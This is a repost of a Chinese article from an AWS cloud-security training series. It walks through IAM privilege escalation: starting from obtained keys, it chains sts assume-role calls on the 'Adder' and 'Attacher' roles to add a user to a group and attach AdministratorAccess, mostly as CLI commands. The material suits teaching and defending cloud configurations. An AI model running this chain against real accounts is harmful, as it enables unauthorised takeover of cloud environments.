AWS云安全系列 6 - IAM危险策略组合 I
2022-4-22 10:22:54 Author: mp.weixin.qq.com(查看原文) 阅读量:5 收藏

国内云安全培训请点击原文或访问以下链接

https://www.yuque.com/u8047536/supvqp/ri4ft0

前提是已经获取了相关的密钥

步骤 1:将 AWS CLI配置为访问凭证

aws configure

步骤 2:列出附加到xx用户的策略

aws iam list-attached-user-policies --user-name xx

步骤 3:尝试创建一个名为 Bob 的新用户

aws iam create-user--user-nameBob

由于权限不足,用户创建失败

步骤 5:获取有关用户内联策略的信息并枚举附加的策略

aws iam list-user-policies --user-name xxaws iam get-user-policy --user-name xx--policy-name terraform-20210211051758659400000002

查看策略中提到的资源

步骤 6: 查看附加到 Adder 的策略并查看角色策略文档

aws iam list-role-policies --role-name Adderaws iam get-role-policy --role-name Adder --policy-name AddUse

角色策略表示,角色 Adder 有权将任何用户添加到Printers组

步骤 7:与xx用户一起使用Adder 角色

aws sts assume-role --role-arn arn:aws:iam::5xxxxxxx8:role/Adder --role-session-name adder_test

记 下 凭据和令牌

步骤 8:在环境变量中设置访问密钥  ID、秘密访问密钥和会话令牌

export AWS_ACCESS_KEY_ID=<access key id>export AWS_SECRET_ACCESS_KEY=<secret access key> export AWS_SESSION_TOKEN=<session token>

步骤 9:将 xx 用户 添加到 Printers 组

aws iam add-user-to-group --group-name Printers --user-name xx

步骤 10:取消设置的环境变量

unset AWS_ACCESS_KEY_IDunset AWS_SECRET_ACCESS_KEY.unset AWS_SESSION_TOKEN

步骤 11:列出xx用户所在的组

 aws iam list-groups-for-user --user-name xx

已成功 将xx用户 添加到 Printers组。

步骤 11:查看附加到Attacher角色的策略,并检查角色策略文档

aws iam list-role-policies --role-name Attacheraws iam get-role-policy --role-name Attacher --policy-name AttachPolicy

角色Attacher有权将任何策略附加到Printers组

步骤 12:识别 AdministratorAccess 策略的 ARN

 aws iam list-policies | grep 'AdministratorAccess

步骤 13: 代入 Attacher 角色

aws sts assume-role --role-arn arn:aws:iam::6xxxxxx6:role/Attacher --role-session-name attacher_test

记 下凭据和令牌

步骤 14:在环境变量中设置访问密钥  ID、秘密访问密钥和会话令牌

export AWS_ACCESS_KEY_ID=<access key id>export AWS_SECRET_ACCESS_KEY=<secret access key>export AWS_SESSION_TOKEN=<session token>

步骤 15:将 AdministratorAccess (管理员访问)角色附加到Printers组

aws iam attach-group-policy --group-name Printers --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

步骤 16: 取消设置所有环境变量

unset AWS_ACCESS_KEY_IDunset AWS_SECRET_ACCESS_KEY.unset AWS_SESSION_TOKEN

步骤 17:检查附加到 Printers组的策略

aws iam list-attached-group-policies --group-name Printers

已成功将管理员访问策略附加到Printers组

步骤 18:尝试创建名为Bob的新用户以验证管理员访问权限

 aws iam create-user --user-name Bob

已成功执行特权操作

1.AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)


文章来源: http://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651868006&idx=1&sn=0b6a99bd889fe351610d1fac01c43b90&chksm=8442b381b3353a97d7da728010c845b62e2f3b33dbd5676c77731c23698ea2c8f072bcee55b2#rd
如有侵权请联系:admin#unsafe.sh